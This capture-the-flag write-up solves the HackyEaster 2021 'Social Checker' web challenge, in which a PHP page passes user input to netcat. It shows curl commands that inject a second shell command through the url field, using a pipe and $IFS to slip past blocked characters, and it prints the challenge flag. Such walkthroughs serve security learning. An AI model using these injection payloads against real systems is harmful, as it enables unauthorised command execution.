HackyEaster2021 Logo

Author(s):

  • PS

Category:

  • Web

Points:

  • 200

File(s):

Hint(s):

  • Some characters are blocked - find a workaround!

Social Checker

Challenge:

Social Checker - check if your favourite social media site is online!

http://46.101.107.117:2103

Solution:

After visiting the challenge URL I was presented with a pulldown list of Social Media services and a Check It! button, which appeared to conduct a port check and return the results:

I viewed the HTML source to determine what the action the submit button was making and found that a PHP script was called and passed a url form field:

<script>
function doCheck() {
  $.post("check.php", {"url": $("#url").val()}, function(data) {
    $("#result").text(data);
  });
}
</script>

My next step was to recreate the same form POST with curl to make it easier to manipulate the form data:

$ curl -X POST -d 'url=twitter.com' 'http://46.101.107.117:2103/check.php'

twitter.com (104.244.42.129:80) open

I submitted junk data for the url value as an attempt to invoke an error condition, which revealed that netcat was being called by the PHP script:

$ curl -X POST -d 'url=junk' 'http://46.101.107.117:2103/check.php'

nc: bad address 'junk'

I spent some time testing various methods for including additional parameters and shell commands to cause a remote command execution and found some humorous messages when specify characters weren't allowed. For example, including a semi-colon produces a YouTube link to a montage of Consuela from Family Guy saying, "No", and using whitespace results in a YouTube link to the song Out Of Space by The Prodigy.

$ curl -X POST 'http://46.101.107.117:2103/check.php' -d 'url=localhost;ls'

nice try - www.youtube.com/watch?v=MF283pORG2E

I was able to work past the character restrictions using a pipe (|) instead of a semi-colon and the Internal Field Separator shell variable ($IFS) in-place of a space:

$ curl -X POST 'http://46.101.107.117:2103/check.php' -d 'url=localhost|ls$IFS.'

ls: 80: No such file or directory
.:
bg.jpg
check.php
flag.txt
index.php

After a bit more testing I was able to create a payload to dump the flag file:

$ curl -X POST 'http://46.101.107.117:2103/check.php' -d 'url=localhost|cat$IFS./flag.txt'

he2021{1ts_fun_t0_1nj3kt_k0mmand5}cat: can't open '80': No such file or directory

Published:

Updated:

Leave a comment